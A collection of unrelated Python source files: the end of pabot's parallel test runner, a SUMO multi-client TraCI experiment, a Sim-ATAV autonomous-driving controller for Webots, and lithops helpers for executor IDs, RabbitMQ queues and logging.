[pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE, 0],
{},
)
return
except RuntimeError as e:
# REMOTE LIB NOT YET CONNECTED
time.sleep(0.1)
raise RuntimeError("Can not connect to PabotLib at %s" % _PABOTLIBURI)
def _add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
):
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES, _NUMBER_OF_ITEMS_TO_BE_EXECUTED
if not _pabotlib_in_use():
return
plib = Remote(_PABOTLIBURI)
new_suites = plib.run_keyword("get_added_suites", [], {})
if len(new_suites) == 0:
return
suite_group = [DynamicSuiteItem(s, v) for s, v in new_suites]
items = [
QueueItem(
datasources,
outs_dir,
opts_for_run,
suite,
pabot_args["command"],
pabot_args["verbose"],
("", None),
pabot_args.get("hive"),
pabot_args["processes"],
)
for suite in suite_group
]
with _COMPLETED_LOCK:
_NUMBER_OF_ITEMS_TO_BE_EXECUTED += len(items)
for item in items:
_NOT_COMPLETED_INDEXES.append(item.index)
execution_items.insert(0, items)
def main(args=None):
global _PABOTLIBPROCESS
args = args or sys.argv[1:]
if len(args) == 0:
print(
"[ "
+ _wrap_with(Color.RED, "ERROR")
+ " ]: Expected at least 1 argument, got 0."
)
print("Try --help for usage information.")
sys.exit(252)
start_time = time.time()
start_time_string = _now()
# NOTE: timeout option
try:
_start_message_writer()
options, datasources, pabot_args, opts_for_run = parse_args(args)
if pabot_args["help"]:
print(__doc__)
sys.exit(0)
if len(datasources) == 0:
print("[ " + _wrap_with(Color.RED, "ERROR") + " ]: No datasources given.")
print("Try --help for usage information.")
sys.exit(252)
_PABOTLIBPROCESS = _start_remote_library(pabot_args)
if _pabotlib_in_use():
_initialize_queue_index()
outs_dir = _output_dir(options)
suite_names = solve_suite_names(outs_dir, datasources, options, pabot_args)
if pabot_args["verbose"]:
_write("Suite names resolved in %s seconds" % str(time.time() - start_time))
ordering = pabot_args.get("ordering")
if ordering:
suite_names = _preserve_order(suite_names, ordering)
suite_names = _group_by_wait(_group_by_groups(suite_names))
if not suite_names or suite_names == [[]]:
_write("No tests to execute")
if not options.get("runemptysuite", False):
sys.exit(252)
execution_items = _create_execution_items(
suite_names, datasources, outs_dir, options, opts_for_run, pabot_args
)
while execution_items:
items = execution_items.pop(0)
_parallel_execute(items, pabot_args["processes"])
_add_dynamically_created_execution_items(
execution_items, datasources, outs_dir, opts_for_run, pabot_args
)
result_code = _report_results(
outs_dir,
pabot_args,
options,
start_time_string,
_get_suite_root_name(suite_names),
)
sys.exit(result_code if not _ABNORMAL_EXIT_HAPPENED else 252)
except Information as i:
print(__doc__)
print(i.message)
except DataError as err:
print(err.message)
sys.exit(252)
except Exception:
_write("[ERROR] EXCEPTION RAISED DURING PABOT EXECUTION", Color.RED)
_write(
"[ERROR] PLEASE CONSIDER REPORTING THIS ISSUE TO https://github.com/mkorpela/pabot/issues",
Color.RED,
)
raise
finally:
if _PABOTLIBPROCESS:
_stop_remote_library(_PABOTLIBPROCESS)
_print_elapsed(start_time, time.time())
_stop_message_writer()
if __name__ == "__main__":
main()
|
sumo_multi_clients.py
|
import os
import subprocess
import threading
import time
from smarts.core.utils.sumo import SUMO_PATH, sumolib, traci
PORT = 8001
"""
Conclusions:
1. connected clients < num-clients: SUMO blocks and only starts once all clients have connected.
2. connected clients > num-clients: extra connections will be closed by SUMO.
3. The simulation does not advance to the next step until all clients have called the 'simulationStep' command.
4. For multi-client scenarios, currently only TargetTime 0 is supported, which means 'simulationStep' performs exactly one time step.
"""
def start_sumo_server():
sumo_binary = "sumo"
sumo_cmd = [
os.path.join(SUMO_PATH, "bin", sumo_binary),
"--net-file=scenarios/loop/map.net.xml",
"--num-clients=3",
"--remote-port=%s" % PORT,
]
sumo_proc = subprocess.Popen(
sumo_cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
time.sleep(0.1)
traci_conn = traci.connect(
PORT, numRetries=100, proc=sumo_proc, waitBetweenRetries=0.01
)
return traci_conn
def connect(port, order=None):
traci_conn = traci.connect(port, numRetries=100, proc=None, waitBetweenRetries=0.1)
if order is not None:
traci_conn.setOrder(order)
return traci_conn
def test_client_connection(client, client_name):
for i in range(10):
print(f"{client_name} steping simulation")
client.simulationStep()
client.close()
def init_client():
client = start_sumo_server()
client.setOrder(1)
test_client_connection(client, "client 1")
def run_client_2():
client2 = connect(PORT, 2)
test_client_connection(client2, "client 2")
def run_client_3():
client3 = connect(PORT, 3)
test_client_connection(client3, "client 3")
def main():
t1 = threading.Thread(target=init_client, args=())
t1.start()
t2 = threading.Thread(target=run_client_2, args=())
t2.start()
t3 = threading.Thread(target=run_client_3, args=())
t3.start()
t1.join()
t2.join()
t3.join()
if __name__ == "__main__":
main()
|
automated_driving_with_fusion2_1.py
|
"""Defines SimpleSensorFusionControl class
----------------------------------------------------------------------------------------------------------
This file is part of Sim-ATAV project and licensed under MIT license.
Copyright (c) 2018 Cumhur Erkan Tuncali, Georgios Fainekos, Danil Prokhorov, Hisahiro Ito, James Kapinski.
For questions please contact:
C. Erkan Tuncali (etuncali [at] asu.edu)
----------------------------------------------------------------------------------------------------------
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sys
import math
import numpy as np
import threading
import pickle
from Sim_ATAV.common.controller_communication_interface import ControllerCommunicationInterface
from Sim_ATAV.vehicle_control.base_controller.base_controller import BaseCarController
from Sim_ATAV.vehicle_control.controller_commons import controller_commons
from Sim_ATAV.vehicle_control.controller_commons.path_following_tools import PathFollowingTools
from Sim_ATAV.vehicle_control.controller_commons.perception.sensor_fusion.sensor_fusion_tracker \
import SensorFusionTracker
from Sim_ATAV.vehicle_control.controller_commons.planning.target_speed_planner import TargetSpeedPlanner,\
TargetSpeedData
from Sim_ATAV.vehicle_control.generic_stanley_controller.generic_stanley_controller \
import GenericStanleyController
from Sim_ATAV.vehicle_control.generic_pid_controller.generic_pid_controller import GenericPIDController
from Sim_ATAV.vehicle_control.controller_commons.visualization.camera_info_display import CameraInfoDisplay
WORLD_TIME_STEP_MS = 10
HAS_DEBUG_DISPLAY = True
SENSOR_TYPE = 'Actual' # 'Actual', 'Perfect'
DEBUG_MODE = False
# Our global variables
target_throttle = [0.65, 0.65, 0.3, 0.0, 0.3, 0.3, 0.3, 0.3, -0.2, -0.4, -0.4, -0.4, -0.4, 0.85, 0.45, 0.45, 0.8, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, -0.2, -0.4, 0.95, 0.45, 0.5, 0.5, 0.9, 0.55, 0.0, 0.55, 0.95, 1.0, 0.65, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3, 0.3]
target_t = [0.25, 0.49, 0.73, 0.97, 1.21, 1.45, 1.69, 1.93, 2.18, 2.44, 2.72, 3.03, 3.37, 3.72, 4.04, 4.35, 4.65, 4.94, 5.23, 5.52, 5.81, 6.1, 6.39, 6.68, 6.97, 7.27, 7.6, 7.93, 8.24, 8.54, 8.83, 9.11, 9.38, 9.65, 9.92, 10.18, 10.43, 10.68, 10.92, 11.16, 11.4, 11.64, 11.88, 12.12, 12.36, 12.6, 12.84, 13.08, 13.32, 13.56, 13.8, 14.04, 14.28, 14.52, 14.76, 15.0, 15.24, 15.48, 15.72, 15.96, 16.2, 16.44, 16.68, 16.92, 17.16, 17.4, 17.64, 17.88, 18.12, 18.36, 18.6, 18.84, 19.08, 19.32, 19.56, 19.8, 20.04, 20.28, 20.52]
exp_out = [[]]
time_index = 0
img_cnt = 1
data_dict = {}
inf = 1e9
def debug_print(print_str):
if DEBUG_MODE:
print(print_str)
sys.stdout.flush()
class PathAndSpeedFollower(BaseCarController):
"""PathAndSpeedFollower class is a car controller class for Webots."""
CAMERA_TO_FRONT_DISTANCE = 2.3 # 2.3 m is the distance from Prius top sensor location to the very front of the car
LIDAR_TO_FRONT_DISTANCE = 2.3
CAMERA_MAIN_RELATIVE_POSITION = [0.0, 1.3]
LIDAR_MAIN_RELATIVE_POSITION = [0.0, 1.3]
RADAR_FRONT_RELATIVE_POSITION = [0.0, 3.6]
FRONT_TO_REAR_WHEELS_DISTANCE = 3.6 # Approximate (this is intentionally longer than the actual wheel base
# for smoother operation)
CAMERA_LOCAL_COORDINATES = [0.0, 1.3, 1.1]
CAMERA_X_ROT_ANGLE = -0.01
CAMERA_LOCAL_ROTATION = np.array([[1.0, 0.0, 0.0],
[0.0, math.cos(CAMERA_X_ROT_ANGLE), -math.sin(CAMERA_X_ROT_ANGLE)],
[0.0, math.sin(CAMERA_X_ROT_ANGLE), math.cos(CAMERA_X_ROT_ANGLE)]])
CAR_FRONT_TRIANGLE_LINE1_M = -192/126 # old value: -0.6 # Line 1 m for front triangle.
CAR_FRONT_TRIANGLE_LINE1_B = 1142.9 # Old value: 526 # Line 1 b for front triangle.
CAR_FRONT_TRIANGLE_LINE2_M = 192/126 # old value: 0.6 # Line 2 m for front triangle.
CAR_FRONT_TRIANGLE_LINE2_B = -758.9 # Old value: -202 # Line 2 b for front triangle.
PED_FRONT_TRIANGLE_LINE1_M = -192/204 # old value: -0.6 # Line 1 m for front triangle.
PED_FRONT_TRIANGLE_LINE1_B = 779.3 # Old value: 526 # Line 1 b for front triangle.
PED_FRONT_TRIANGLE_LINE2_M = 192/204 # old value: 0.6 # Line 2 m for front triangle.
PED_FRONT_TRIANGLE_LINE2_B = -395.3 # Old value: -202 # Line 2 b for front triangle.
CLASSIFIER_PERIOD_MS = 100
LIDAR_PERIOD_MS = 200
RADAR_PERIOD_MS = 200
MIN_EMERGENCY_BRAKE_DURATION_MS = 100.0
MEASURE_EXEC_TIME = False
LANE_WIDTH = 3.5
MIN_STEERING_MANEUVER_MS = 2000.0
EMERGENCY_STEERING_TTC = 1.0
OBJECT_TRACKER_MAX_DISTANCE = 70.0
def __init__(self, controller_parameters):
(car_model, target_speed_m_s, is_direct_speed_control, target_lat_pos, self_vhc_id, slow_at_intersection,
use_fusion) = controller_parameters
BaseCarController.__init__(self, car_model)
self.slow_at_intersection = slow_at_intersection in ('True', 'true', 'yes', 'Yes')
self.is_direct_speed_control = is_direct_speed_control in ('True', 'true', 'yes', 'Yes')
self.use_fusion = use_fusion in ('True', 'true', 'yes', 'Yes')
self.camera_device_name = 'camera'
self.camera = None
self.compass_device_name = 'compass'
self.compass = None
self.display_device_name = 'display'
self.display = None
self.camera_info_display = None
self.sensor_display_device_name = 'sensor_display'
self.sensor_display = None
self.sensor_info_display = None
self.gps_device_name = 'gps'
self.gps = None
self.receiver_device_name = 'receiver'
self.receiver = None
self.emitter_device_name = 'emitter'
self.emitter = None
self.lidar_main_device_name = 'velodyne' # 'ibeo', 'velodyne'
self.lidar_main = None
self.radar_front_device_name = 'radar'
self.radar_front = None
self.target_speed_m_s = float(target_speed_m_s)
self.classifier = None
self.classification_client = None
self.obj_tracker = None
self.ground_truth_generator = None
self.contr_comm = ControllerCommunicationInterface()
self.target_lat_pos = float(target_lat_pos)
self.target_bearing = 0.0
self.lateral_controller = GenericStanleyController()
self.lateral_controller.k = 0.5
self.lateral_controller.k2 = 0.4
self.lateral_controller.k3 = 1.1
self.lateral_controller.set_output_range(-0.8, 0.8)
self.longitudinal_controller = GenericPIDController(0.15, 0.01, 0.0)
self.longitudinal_controller.set_integrator_value_range(-20.0, 20.0)
self.self_vhc_id = int(self_vhc_id)
self.path_following_tools = PathFollowingTools()
self.self_sensor_fusion_tracker = None
self.last_segment_ind = 0
self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
self.last_segment_ind = 0
self.detour_start_time = None
self.target_speed_planner = TargetSpeedPlanner(default_speed=self.target_speed_m_s)
print('AutomatedDrivingControl Initialized: {}, {}'.format(car_model, self.target_speed_m_s))
def start_devices(self):
"""Start the devices on the car and initialize objects like classifier."""
# Start camera and the sensors:
self.camera = self.getCamera(self.camera_device_name)
if self.camera is not None:
self.camera.enable(self.CLASSIFIER_PERIOD_MS)
self.camera_info_display = CameraInfoDisplay(self.display)
self.gps = self.getGPS(self.gps_device_name)
if self.gps is not None:
self.gps.enable(WORLD_TIME_STEP_MS)
self.compass = self.getCompass(self.compass_device_name)
if self.compass is not None:
self.compass.enable(WORLD_TIME_STEP_MS)
self.receiver = self.getReceiver(self.receiver_device_name)
if self.receiver is not None:
self.receiver.enable(WORLD_TIME_STEP_MS)
self.emitter = self.getEmitter(self.emitter_device_name)
# Start the car engine
self.start_car()
def run(self):
"""Runs the controller."""
self.start_devices()
print("Devices Started.")
sys.stdout.flush()
def get_self_position():
"""Returns current self position."""
return self.self_current_state[0:2]
def get_self_speed_ms():
"""Returns current speed in m/s."""
return self.self_current_state[2]
def get_self_yaw_angle():
"""Returns self yaw angle in radians."""
return self.self_current_state[3]
# Internal functions to keep the code more readable:
def read_gps_sensor(gps_device):
"""Reads GPS sensor."""
if gps_device is not None:
sensor_gps_speed_m_s = gps_device.getSpeed()
sensor_gps_position_m = gps_device.getValues()
else:
sensor_gps_speed_m_s = 0.0
sensor_gps_position_m = [0.0, 0.0, 0.0]
return sensor_gps_position_m, sensor_gps_speed_m_s
def read_compass_sensor(compass_device):
"""Reads Compass Sensor."""
if compass_device is not None:
sensor_compass_bearing_rad = controller_commons.get_bearing(compass_device)
else:
sensor_compass_bearing_rad = 0.0
return sensor_compass_bearing_rad
def compute_and_apply_control():
"""Computes control output using the detected objects from sensor suite."""
cur_position = get_self_position()
cur_speed_ms = get_self_speed_ms()
cur_yaw_angle = get_self_yaw_angle()
# Compute control
if self.path_following_tools.target_path is not None:
# Compute distance from front wheels for smoother turns:
temp_cur_pos = [cur_position[0] - (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.sin(cur_yaw_angle) +
cur_speed_ms * 0.2 * math.sin(cur_yaw_angle)),
cur_position[1] + (self.FRONT_TO_REAR_WHEELS_DISTANCE * math.cos(cur_yaw_angle) +
cur_speed_ms * 0.2 * math.cos(cur_yaw_angle))]
(current_segment_ind, line_segment_as_list, nearest_pos_on_path, dist_to_seg_end) = \
self.path_following_tools.get_current_segment(temp_cur_pos, self.last_segment_ind)
(distance_err, angle_err) = \
self.path_following_tools.get_distance_and_angle_error(temp_cur_pos,
cur_yaw_angle,
last_segment_ind=self.last_segment_ind,
is_detouring=False)
self.last_segment_ind = current_segment_ind
if len(self.path_following_tools.path_details) > current_segment_ind:
(next_turn_angle, travel_distance) = self.path_following_tools.path_details[current_segment_ind]
travel_distance += dist_to_seg_end
else:
(next_turn_angle, travel_distance) = (0.0, 0.0)
else:
current_segment_ind = -1
angle_err = self.target_bearing - cur_yaw_angle
while angle_err > math.pi:
angle_err -= 2*math.pi
while angle_err < -math.pi:
angle_err += 2*math.pi
distance_err = -(self.target_lat_pos - cur_position[0])
(next_turn_angle, travel_distance) = (0.0, 0.0)
current_target_speed = \
self.target_speed_planner.get_current_target_speed(cur_time_ms=cur_time_ms,
cur_segment_ind=current_segment_ind)
if self.slow_at_intersection and abs(next_turn_angle) > math.pi/60 and travel_distance < 100.0:
turn_ratio = min(1.0, abs(next_turn_angle)/(math.pi/4.0))
max_speed_limit = 10.0 + ((1.0 - turn_ratio)*30.0)
# decrease the speed limit as we approach the intersection.
max_speed_limit = (max_speed_limit + (current_target_speed - max_speed_limit) *
((max(travel_distance, 10.0)-10.0)/80.0))
else:
max_speed_limit = current_target_speed
control_steering = self.lateral_controller.compute(angle_err,
distance_err,
cur_speed_ms)
speed_ratio = min(1.0, self.self_current_state[2]/22.0)
max_steering = 0.1 + (1.0 - speed_ratio)*0.7
control_steering = min(max(-max_steering, control_steering), max_steering)
if self.is_direct_speed_control:
# self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(10.0), angle=control_steering)
'''
v = 0.1
t = 0.3
global t1, v1, flag
if cur_time_ms==100:
self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(v), angle=control_steering)
elif cur_time_ms>=5000:
self.set_throttle(t)
# if cur_time_ms%200==0:
# print("time: "+str(cur_time_ms)+" vel: "+str(cur_speed_ms))
if abs(round(cur_speed_ms,0)-cur_speed_ms)<0.01:
t1 = cur_time_ms
v1 = cur_speed_ms
# print ("--> "+str(t1))
if cur_time_ms-t1 in (100,200,300,400,500,600,700,800,900,1000):
a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
# print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
'''
# if cur_time_ms-t1 == 1000:
# a = ((cur_speed_ms-v1)/(cur_time_ms-t1))*1000
# print("time: "+str(cur_time_ms)+" diff: "+str(cur_time_ms-t1)+" speed: "+str(round(v1,2)) + " acc: "+str(round(a,2)))
if cur_time_ms<5010:
x = 20.0
self.set_target_speed_and_angle(speed= controller_commons.speed_ms_to_kmh(x) ,angle=control_steering)
else:
global time_index
if(target_t[time_index] < ((cur_time_ms/1000.0) -5) ):
time_index = time_index + 1
# x2 = exp_out[time_index][0]
# y2 = exp_out[time_index][1]
inc = 0.0
# if(time_index>0):
# t1 = exp_out[time_index-1][4]
# dt = cur_time_ms/1000.0 - 3 - t1
# x1 = exp_out[time_index-1][0]
# u1 = exp_out[time_index-1][3]
# a2 = exp_out[time_index][2]
# dx = u1*dt + 0.5*a2*dt*dt
# if(abs(x2-x1)==5.0):
# if( (dx-0.5)/abs(x2-x1)>(cur_position[1]-x1)/(x2-x1) ):
# inc = 0.05
# elif( (dx+0.5)/abs(x2-x1)<(cur_position[1]-x1)/(x2-x1) ):
# inc = -0.05
# else:
# inc = 0.0
# if(target_throttle[time_index])
self.set_throttle_and_steering_angle(target_throttle[time_index]+inc, control_steering)
# if cur_time_ms%100==0:
# global img_cnt
# img_name = "img_"+str(img_cnt)+".png"
# self.camera.saveImage("../../../images/"+img_name,1)
# img_cnt = img_cnt + 1
# data_dict[img_name] = [cur_speed_ms,target_throttle[time_index],control_steering]
# self.set_target_speed_and_angle(speed=controller_commons.speed_ms_to_kmh(min(max_speed_limit,
# current_target_speed)),
# angle=control_steering)
if cur_time_ms%500==0:
print("Time: "+str(cur_time_ms)+" Agent vehicle speed: "+str(cur_speed_ms) + " pos: "+str(cur_position))
else:
control_throttle = self.longitudinal_controller.compute(min(max_speed_limit, current_target_speed)
- cur_speed_ms)
self.set_throttle_and_steering_angle(control_throttle, control_steering)
if current_target_speed < 0.0:
# Emergency / sudden braking
self.set_brake(1.0)
self.set_throttle(0.0)
while self.step() >= 0:
sim_time = self.get_sim_time()
cur_time_ms = int(round(1000 * sim_time))
# -------------- Read Sensors----------------
# ************ Read GPS ************
(sensor_gps_position_m, sensor_gps_speed_m_s) = read_gps_sensor(self.gps)
# ************ Read Compass ************
sensor_compass_bearing_rad = read_compass_sensor(self.compass)
# -------------- Sensor Fusion ----------------
# ************ Sensor Fusion for own states (GPS + Compass) ************
if self.self_sensor_fusion_tracker is None:
self.self_current_state = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
sensor_compass_bearing_rad, 0.0]
if sensor_gps_speed_m_s > 50.0 or sensor_gps_speed_m_s < -20.0: # Filter out erroneous GPS speed readings
sensor_gps_speed_m_s = 0.0
self.self_current_state[2] = sensor_gps_speed_m_s
if self.use_fusion:
# Initiate self sensor fusion tracker
self.self_sensor_fusion_tracker = SensorFusionTracker(initial_state_mean=self.self_current_state,
filter_type='ukf')
else:
if self.gps is not None and self.compass is not None:
measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s,
sensor_compass_bearing_rad]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS_COMPASS)
elif self.gps is not None:
measurement = [sensor_gps_position_m[0], sensor_gps_position_m[2], sensor_gps_speed_m_s]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_GPS)
elif self.compass is not None:
measurement = [sensor_compass_bearing_rad]
(self.self_current_state, state_cov) = self.self_sensor_fusion_tracker.get_estimates(
measurements=measurement, sensor_type=SensorFusionTracker.SENSOR_TYPE_COMPASS)
else:
self.self_current_state = [0.0, 0.0, 0.0, 0.0, 0.0]
# Read sensor-like information from Simulation Supervisor
if self.receiver is not None:
messages = self.contr_comm.receive_all_communication(self.receiver)
command_list = self.contr_comm.extract_all_commands_from_message(messages)
path_modified = False
for command_item in command_list:
command = command_item[0]
if command == ControllerCommunicationInterface.SET_CONTROLLER_PARAMETERS_MESSAGE:
parameter = command_item[1]
if parameter.get_vehicle_id() == self.self_vhc_id:
if parameter.get_parameter_name() == 'target_position':
parameter_data = parameter.get_parameter_data()
# print(parameter_data)
self.path_following_tools.add_point_to_path(parameter_data)
path_modified = True
elif parameter.get_parameter_name() == 'target_speed_at_time':
# 1st parameter is the start time for the target speed in seconds as float.
# 2nd: how long the target speed will be active, in seconds; -1 for infinite/until next.
# 3rd parameter is the target speed.
parameter_data = parameter.get_parameter_data()
if parameter_data[1] < 0:
target_length = math.inf
else:
target_length = int(round(1000 * parameter_data[1]))
self.target_speed_planner.add_target_speed_data(
TargetSpeedData(event_type='time',
start_time=int(round(1000 * parameter_data[0])),
length=target_length,
target_speed=parameter_data[2]))
elif parameter.get_parameter_name() == 'target_speed_at_segment':
# 1st parameter is the start segment index for the target speed.
# 2nd: how long the target speed will be active, in seconds:
# -1 for infinite/until next, 0 for during the segment
# 3rd parameter is the target speed.
parameter_data = parameter.get_parameter_data()
if parameter_data[1] < 0:
target_length = -1
else:
target_length = int(round(1000 * parameter_data[1]))
self.target_speed_planner.add_target_speed_data(
TargetSpeedData(event_type='segment',
start_time=int(round(parameter_data[0])),
length=target_length,
target_speed=parameter_data[2]))
if path_modified:
self.path_following_tools.smoothen_the_path()
self.path_following_tools.populate_the_path_with_details()
# print(self.path_following_tools.target_path)
#----------Dynamic Path computation starts-------------------------
'''
if(cur_time_ms == 10):
cur_position = get_self_position()
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
global suboptimalPath
if (cur_time_ms == 8000):
t1.join()
self.path_following_tools.target_path = None
self.path_following_tools.path_details = None
for pt in suboptimalPath:
self.path_following_tools.add_point_to_path(pt)
self.path_following_tools.smoothen_the_path()
self.path_following_tools.populate_the_path_with_details()
cur_position = suboptimalPath[-1]
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
elif (cur_time_ms % 8000 == 0):
t1.join()
# print(suboptimalPath)
# cur_position = get_self_position()
# (cur_seg,line_seg,nearest_pos,dis) = self.path_following_tools.get_current_segment(cur_position,0,self.path_following_tools.target_path)
self.path_following_tools.target_path = self.path_following_tools.future_target_path
self.path_following_tools.path_details = self.path_following_tools.future_path_details
cur_position = suboptimalPath[-1]
t1 = threading.Thread(target=self.computeTargetPath, args=(cur_position,))
t1.start()
'''
#---------Dynamic Path computation end--------------------
compute_and_apply_control()
out_file = "../../../control_throttle.pkl"
with open(out_file, 'wb') as handle:
pickle.dump(data_dict, handle, protocol=pickle.HIGHEST_PROTOCOL)
# Clean up
del self.classifier
del self.obj_tracker
print("Bye!")
sys.stdout.flush()
|
utils.py
|
#
# Copyright 2018 PyWren Team
# (C) Copyright IBM Corp. 2020
# (C) Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import io
import re
import os
import sys
import pika
import uuid
import json
import base64
import inspect
import struct
import lithops
import zipfile
import platform
import logging.config
import threading
from lithops.storage.utils import create_job_key
from lithops.constants import LOGGER_FORMAT, LOGGER_LEVEL
logger = logging.getLogger(__name__)
def uuid_str():
return str(uuid.uuid4())
def create_executor_id(length=6):
""" Creates an executor ID. """
if '__LITHOPS_SESSION_ID' in os.environ:
session_id = os.environ['__LITHOPS_SESSION_ID']
else:
session_id = uuid_str().replace('/', '')[:length]
os.environ['__LITHOPS_SESSION_ID'] = session_id
if '__LITHOPS_TOTAL_EXECUTORS' in os.environ:
exec_num = int(os.environ['__LITHOPS_TOTAL_EXECUTORS']) + 1
else:
exec_num = 0
os.environ['__LITHOPS_TOTAL_EXECUTORS'] = str(exec_num)
return '{}-{}'.format(session_id, exec_num)
def get_executor_id():
""" retrieves the current executor ID. """
session_id = os.environ['__LITHOPS_SESSION_ID']
exec_num = os.environ['__LITHOPS_TOTAL_EXECUTORS']
return '{}-{}'.format(session_id, exec_num)
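# Illustrative example (hypothetical values): the first executor created in a
# fresh session might get the ID 'f3a9c1-0', the next one 'f3a9c1-1', where the
# prefix is the random session id and the suffix is the executor counter.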
def create_rabbitmq_resources(rabbit_amqp_url, executor_id, job_id):
"""
Creates RabbitMQ queues and exchanges of a given job in a thread.
Called when a job is created.
"""
logger.debug('ExecutorID {} | JobID {} - Creating RabbitMQ resources'.format(executor_id, job_id))
def create_resources(rabbit_amqp_url, executor_id, job_id):
job_key = create_job_key(executor_id, job_id)
exchange = 'lithops-{}'.format(job_key)
queue_0 = '{}-0'.format(exchange) # For waiting
queue_1 = '{}-1'.format(exchange) # For invoker
params = pika.URLParameters(rabbit_amqp_url)
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.exchange_declare(exchange=exchange, exchange_type='fanout', auto_delete=True)
channel.queue_declare(queue=queue_0, auto_delete=True)
channel.queue_bind(exchange=exchange, queue=queue_0)
channel.queue_declare(queue=queue_1, auto_delete=True)
channel.queue_bind(exchange=exchange, queue=queue_1)
connection.close()
th = threading.Thread(target=create_resources, args=(rabbit_amqp_url, executor_id, job_id))
th.daemon = True
th.start()
def delete_rabbitmq_resources(rabbit_amqp_url, executor_id, job_id):
"""
Deletes RabbitMQ queues and exchanges of a given job.
Only called when an exception is produced, otherwise resources are
automatically deleted.
"""
job_key = create_job_key(executor_id, job_id)
exchange = 'lithops-{}'.format(job_key)
queue_0 = '{}-0'.format(exchange) # For waiting
queue_1 = '{}-1'.format(exchange) # For invoker
params = pika.URLParameters(rabbit_amqp_url)
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.queue_delete(queue=queue_0)
channel.queue_delete(queue=queue_1)
channel.exchange_delete(exchange=exchange)
connection.close()
def agg_data(data_strs):
"""Auxiliary function that aggregates data of a job to a single
byte string.
"""
ranges = []
pos = 0
for datum in data_strs:
datum_len = len(datum)
ranges.append((pos, pos+datum_len-1))
pos += datum_len
return b"".join(data_strs), ranges
def setup_logger(logging_level=LOGGER_LEVEL,
stream=None,
logging_format=LOGGER_FORMAT):
"""Setup default logging for lithops."""
if stream is None:
stream = sys.stderr
if type(logging_level) is str:
logging_level = logging.getLevelName(logging_level.upper())
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': logging_format
},
},
'handlers': {
'default': {
'level': logging_level,
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': stream
},
},
'loggers': {
'lithops': {
'handlers': ['default'],
'level': logging_level,
'propagate': False
},
}
})
def create_handler_zip(dst_zip_location, entry_point_file, entry_point_name=None):
"""Create the zip package that is uploaded as a function"""
logger.debug("Creating function handler zip in {}".format(dst_zip_location))
def add_folder_to_zip(zip_file, full_dir_path, sub_dir=''):
for file in os.listdir(full_dir_path):
full_path = os.path.join(full_dir_path, file)
if os.path.isfile(full_path):
zip_file.write(full_path, os.path.join('lithops', sub_dir, file))
elif os.path.isdir(full_path) and '__pycache__' not in full_path:
add_folder_to_zip(zip_file, full_path, os.path.join(sub_dir, file))
try:
with zipfile.ZipFile(dst_zip_location, 'w', zipfile.ZIP_DEFLATED) as lithops_zip:
module_location = os.path.dirname(os.path.abspath(lithops.__file__))
entry_point_name = entry_point_name or os.path.basename(entry_point_file)
lithops_zip.write(entry_point_file, entry_point_name)
add_folder_to_zip(lithops_zip, module_location)
except Exception as e:
raise Exception('Unable to create the {} package: {}'.format(dst_zip_location, e))
def verify_runtime_name(runtime_name):
"""Check if the runtime name has a correct formating"""
assert re.match("^[A-Za-z0-9_/.:-]*$", runtime_name),\
'Runtime name "{}" not valid'.format(runtime_name)
def timeout_handler(error_msg, signum, frame):
raise TimeoutError(error_msg)
def version_str(version_info):
"""Format the python version information"""
return "{}.{}".format(version_info[0], version_info[1])
def is_unix_system():
"""Check if the current OS is UNIX"""
current_system = platform.system()
return current_system != 'Windows'
def is_lithops_worker():
"""
Checks if the current execution is within a lithops worker
"""
if 'LITHOPS_WORKER' in os.environ:
return True
return False
def is_object_processing_function(map_function):
func_sig = inspect.signature(map_function)
return {'obj', 'url'} & set(func_sig.parameters)
def is_notebook():
try:
shell = get_ipython().__class__.__name__
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
except NameError:
return False # Probably standard Python interpreter
def convert_bools_to_string(extra_env):
"""
Converts all booleans of a dictionary to a string
"""
for key in extra_env:
if type(extra_env[key]) == bool:
extra_env[key] = str(extra_env[key])
return extra_env
def sizeof_fmt(num, suffix='B'):
